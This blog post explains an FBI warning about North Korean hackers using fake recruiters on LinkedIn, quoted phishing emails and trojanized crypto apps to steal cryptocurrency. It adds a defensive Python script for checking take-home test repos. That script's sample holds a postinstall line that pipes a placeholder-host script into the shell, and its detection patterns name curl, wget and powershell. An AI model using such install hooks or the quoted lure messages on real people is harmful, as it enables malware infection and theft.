Read This: How North Korean Threat Actors Can Use LinkedIn to Steal Your Crypto
Image source: Screenshot of FBI PSA

On September 3rd, the FBI released a warning about North Korean hackers using "Well-Disguised" and sophisticated social engineering techniques to steal cryptocurrency. What's new this time? Let's examine the details.

According to the FBI, here's how these cybercriminals operate:

The hackers begin by researching their victims' social media activity, especially on job-related social media networks like LinkedIn. They then use the victim's "background, skills, employment, or business interests to craft customized fictional scenarios designed to be uniquely appealing to the targeted person." That humble-brag post about your latest crypto investment? They saw it. Your skills section boasting about your promotion, thanking your supervisor? They took notes.

While this may seem pretty obvious to many in the security field, the average Joe in finance or management (no offense to anyone in either field) may have yet to learn this. Remember, these are not simple impersonation attempts. The hackers "impersonate recruiting firms or technology companies backed by professional websites designed to make the fake entities appear legitimate". They initiate conversations in fluent English, build trust methodically, and present their malware in a way that appears "natural and non-alerting". The FBI also warns that these threat actors might "use fake images of time-sensitive events to induce immediate action from intended victims." Remember those notes the hypothetical hackers took on you? They're meticulously crafting a persona that's tailor-made to appeal to you.

An example of a scenario

Here's an example of how this scam might play out in the real world. Note: This is just an example, but it illustrates the sophisticated nature of these attacks.

Enter Alex Chen, a senior cybersecurity analyst and crypto investor with over a decade of experience proudly displayed on his LinkedIn profile. Unfortunately, he becomes the target of a sophisticated North Korean hacking operation.

The hackers begin by meticulously studying Alex's LinkedIn profile, noting his interest in AI and his expertise in the latest cybersecurity threats. After gathering more information on Alex from his other social profiles, they create a convincing fake identity: "Sarah Johnson," a recruiter for a fictional AI-driven cybersecurity startup called "NexGen Cyber Defense."

To establish legitimacy, the hackers set up a professional-looking website for NexGen and create several fake employee profiles on LinkedIn. These profiles are carefully curated to have connections within Alex's professional circle. They're building a whole cinematic universe, and Alex is the unsuspecting audience. Sarah then initiates contact with Alex, sending him a seemingly professional DM, and they begin exchanging industry insights and sharing relevant articles to build rapport. It's all so natural; Alex never suspects a thing.

It's a slow burn, deliberately so.

Over several weeks or months, Sarah builds trust using common psychological tactics (read Influence by Robert Cialdini); she even consistently mentions her firm to Alex. Eventually, she presents an exciting job opportunity to Alex, tailored to his expertise and interests. The critical moment comes when she sends a link to a "confidential job description" that's actually disguised malware. To create urgency, Sarah mentions they're in the final stages of hiring and includes a fake screenshot showing only one interview slot remaining. If Alex hesitates, Sarah follows up with gentle reminders.

What to look out for

Now, I know what you're thinking: "I'm too smart to fall for this." Maybe you are, but let's be real: these scams are ultimately sponsored by the government of North Korea, which intends to use the stolen crypto to fund its nuclear program. They're good, and there is a reason they've managed to siphon $3 billion in 5 years. According to the FBI, here are some specific indicators to watch for:

  • Requests to execute code or download applications on company-owned devices or devices with access to a company's internal network.
  • Requests to conduct a "pre-employment test" or debugging exercise involving non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.
  • Unexpected job offers from prominent cryptocurrency or technology firms with unrealistically high compensation and no negotiation.
  • Unsolicited investment offers from prominent companies or individuals.
  • Insistence on using non-standard or custom software for simple tasks easily achievable through common applications (e.g., video conferencing or connecting to a server).
  • Requests to run scripts to enable call or video teleconference functionalities supposedly blocked due to the victim's location.
  • Attempts to move professional conversations to other messaging platforms or applications.
  • Unsolicited contacts containing unexpected links or attachments.
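The second indicator above (a "pre-employment test" built on unknown Node.js or PyPI packages) can be triaged before anything is installed. The script below is an added example for this article, not FBI or author code: it reads a candidate repo's package.json and requirements.txt and flags dependencies that run code at install time or resolve outside the public registries. The sample files and the example.invalid domain are constructed placeholders.

```python
"""Triage a "take-home test" repo before running npm/pip install.
Added example for this article, not FBI or author code; it flags the lure
pattern described above: dependencies that run code at install time or
come from somewhere other than the public registry."""
import json
import re

# npm runs these script hooks automatically during `npm install`.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# Fetch/eval primitives that have no place in a coding exercise's scripts.
SUSPICIOUS_CMD = re.compile(r"\b(curl|wget|node\s+-e|eval|base64|powershell)\b", re.I)
# Version specs that bypass the npm registry: git, URLs, tarballs, local paths.
OFF_REGISTRY = re.compile(r"^(git\+|git://|https?://|file:|github:|[\w-]+/[\w.-]+$)", re.I)
# pip lines that install from a URL, a git repo, a local path or an alternate index.
OFF_PYPI = re.compile(r"(https?://|git\+|file:|^-e\s|^--(extra-)?index-url)", re.I)


def triage_package_json(text):
    """Return human-readable findings for a package.json; [] means nothing flagged."""
    pkg = json.loads(text)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings.append(f"'{hook}' hook runs automatically on install: {cmd}")
        if SUSPICIOUS_CMD.search(cmd):
            findings.append(f"script '{hook}' shells out to a fetch/eval primitive: {cmd}")
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in pkg.get(section, {}).items():
            if OFF_REGISTRY.match(spec):
                findings.append(f"{section}/{name} resolves outside the registry: {spec}")
    return findings


def triage_requirements(text):
    """Return findings for a requirements.txt (one requirement per line)."""
    lines = (line.strip() for line in text.splitlines())
    return [f"requirement resolves outside PyPI: {line}"
            for line in lines if line and not line.startswith("#") and OFF_PYPI.search(line)]


# Constructed sample: looks like an ordinary React exercise, but installing it
# runs a downloader and pulls one dependency from a git URL (domain is a placeholder).
SAMPLE_PACKAGE_JSON = """{
  "name": "nexgen-frontend-assessment",
  "scripts": {"postinstall": "curl -s https://example.invalid/setup.sh | sh", "test": "jest"},
  "dependencies": {"react": "^18.2.0",
                   "nexgen-utils": "git+https://example.invalid/nexgen/utils.git"}
}"""
SAMPLE_REQUIREMENTS = "requests==2.31.0\n# helper lib from the 'recruiter'\n-e git+https://example.invalid/nexgen/helper.git#egg=helper\n"
```

Run `triage_package_json(SAMPLE_PACKAGE_JSON)` and `triage_requirements(SAMPLE_REQUIREMENTS)` on the constructed samples; a clean exercise returns empty lists, while the samples produce three and one findings respectively.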

If you're concerned about being targeted, review the official FBI document and take note of the recommended mitigations. For insight into how these fake sites appear, examine pages 23, 24, 28, 33, 34, 42, and 45 of the DOJ affidavit on the seizure of 12 domains associated with North Korean cyber gangs. It's worth a few seconds of your time, particularly if you work in or invest in the cryptocurrency sector.

Samples of messages from the FBI

You know, it's one thing to talk about these attacks in the abstract, but it's another to see how they actually play out. Let's dive into some real examples that the FBI has uncovered according to their joint advisory from June 2023. I can imagine some of you thinking, "These would never work on me", but they're happening right now, targeting real people in the crypto world.

The Journalist Impersonator

Imagine you're a respected think tank researcher, and you receive an email from a well-known journalist. The email might look something like this:

Greetings,

My name is <name of writer>, and I am a writer for <name of legitimate Korean journal program>.

I am writing to you today because I am currently preparing for a program related to North Korean issues. Professor <name of professor> of <actual Korean university>, whom I contacted earlier, recommended you as an expert on this issue. I would be grateful if you could spare some time to answer a few questions.

Thank you for considering my request. I look forward to hearing from you soon.

Best regards,        

Looks legit, right? The topic is timely, the writing style might seem legit, and it's coming from a journalist you might recognize. The hacker has done their homework, crafting a message that feels authentic and appealing to your expertise.

If you respond, you'll likely get a follow-up with a malicious attachment or link.

Dear <name of expert>,

As promised, I am sending you a questionnaire. It would be greatly appreciated if you could answer each question in 4-5 sentences. Thank you for your cooperation.

Best regards,

@ attached file: [<name of legitimate Korean journal program>] questionnaire.docx        

And just like that, they're in.

The Academic Researcher

These hackers don't just stop at impersonating journalists. They'll pose as South Korean academic scholars too. Check out this example:

Title: <name of legitimate Korean think tank institute> Request for survey

Hello,

I am <name of an academic scholar> from <name of legitimate Korean think tank>.

I am reaching out to ask if you would be willing to participate in a survey on North Korea's nuclear development titled, "A survey on the perception on experts on the advancement of North Korean nuclear weapons and the denuclearization of the Korean Peninsula". Our goal is to find ways to resolve North Korean nuclear issues and achieve denuclearization on the Korean Peninsula. Rest assured that all answers will be kept confidential and used solely for research purpose. As a token of appreciation, we would like to offer 300,000 won to those who participate in the survey. If you're interested in participating, please reply to this message, and we will send you the survey questionnaire. Looking forward to hearing from you soon.

Best regards,        

Now, if you're an expert in this field, this might seem like a golden opportunity. Share your expertise, contribute to important research, and get paid for it? Sounds great! But if you respond, you'll get a follow-up like this:

Title: RE: RE: <name of legitimate Korean think tank institute> Request for survey

Thank you for your response.

We will send you a document form for payment, which includes a personal information usage agreement. If possible, please fill out your affiliation, name, ID number, bank account, and signature, and attach copies of your bankbook and ID card.

Best regards,

P.S. The attached document is password-protected, and I will send you the password in a 'password.txt file'        

And there's the trap. That "password-protected" document? It's malware. And if you open it, you're giving the hackers access to your system.

Read these samples yourself here. Scroll down to page 7 and further to see the first example.

Beware of Trojan horse apps

But it's not just about email phishing. These hackers are also creating entire fake cryptocurrency applications. They're not just crude knockoffs either - we're talking sophisticated, professional-looking apps with names like "CryptAIS" and "AlticGO".

Image source: Drew Todd, SecureWorld

These apps claim to offer services like AI-based trading or live cryptocurrency prices, and they're packaged with slick websites to further legitimize them. But hidden within the code is a function that downloads and executes malicious payloads.

For instance, an app called Esilet was found to be delivering variants of a remote access trojan (also known as a RAT) called Manuscrypt. This trojan can collect system information and execute arbitrary commands, giving the hackers full control over the infected system.

They'll try to build trust with you

What's particularly insidious about these attacks is how patient and methodical they are. The hackers don't just fire off a single email and hope for the best. They play the long game.

This level of social engineering is what makes these attacks so dangerous. It's not just about technical vulnerabilities - it's about exploiting human nature, our desire to connect, to be helpful, to seize opportunities.

Remember, in the world of cryptocurrency, your digital assets are only as secure as your cybersecurity practices. Stay vigilant, stay informed, and don't let the promise of easy money cloud your judgment.
